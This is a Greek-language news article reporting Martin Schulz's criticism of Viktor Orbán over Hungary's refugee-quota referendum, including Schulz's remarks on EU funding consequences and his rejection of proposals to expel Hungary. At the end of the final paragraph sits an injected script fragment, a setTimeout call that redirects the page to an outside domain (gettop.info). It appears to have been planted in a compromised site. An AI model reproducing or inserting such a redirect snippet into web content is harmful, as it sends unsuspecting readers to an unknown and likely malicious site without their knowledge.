Επίθεση Σουλτς κατά Όρμπαν για το δημοψήφισμα στην Ουγγαρία

0
7

 

Τη διεξαγωγή του σημερινού δημοψηφίσματος στην Ουγγαρία επέκρινε ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου. Σε συνέντευξή του προς τον γερμανικό δημοσιογραφικό όμιλο Funke ο Μάρτιν Σουλτς υπογραμμίζει ότι «βάσει της ποσόστωσης η Ουγγαρία θα έπρεπε να υποδεχθεί μόλις 1.300 πρόσφυγες. Το να αποτελεί αυτό αντικείμενο δημοψηφίσματος είναι ένα επικίνδυνο παιχνίδι», λέει χαρακτηριστικά ο πρόεδρος του Ευρωκοινοβουλίου, προσθέτοντας ότι με αυτόν τον τρόπο ο Ούγγρος πρωθυπουργός παραβιάζει θεμελιώδεις ευρωπαϊκές αρχές, αναδημοσιεύει η Deutsche Welle.

«Ο Όρμπαν θέτει εν αμφιβόλω την ευρωπαϊκή νομοθεσία, στη διαμόρφωση της οποίας συμμετείχε και ο ίδιος», λέει χαρακτηριστικά ο σοσιαλδημοκράτης Γερμανός πολιτικός.

Κινδυνεύει η χρηματοδότηση;

Ο Μάρτιν Σουλτς θέτει μάλιστα και θέμα χρηματοδότησης, τονίζοντας ότι οι χώρες που δεν επιδεικνύουν αλληλεγγύη στην προσφυγική κρίση θα πρέπει να νιώσουν τις οικονομικές συνέπειες.

Στην παρούσα φάση, όπως λέει, επωμίζονται το μεγαλύτερο βάρος οι χώρες που συνεισφέρουν τα περισσότερα χρήματα στα κοινοτικά ταμεία. «Εάν λοιπόν κάποιες χώρες που χρηματοδοτούνται από την ΕΕ θεωρούν ότι έχουν δικαίωμα στην αλληλεγγύη, χωρίς όμως οι ίδιες να είναι αλληλέγγυες, τότε αυτό θα συζητηθεί ασφαλώς κατά τον έλεγχο του οικονομικού σχεδιασμού».

Ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου απέρριψε πάντως την πρόταση του λουξεμβούργιου υπουργού Εξωτερικών Ζαν Άσελμπορν για αποπομπή της Ουγγαρίας από την ΕΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here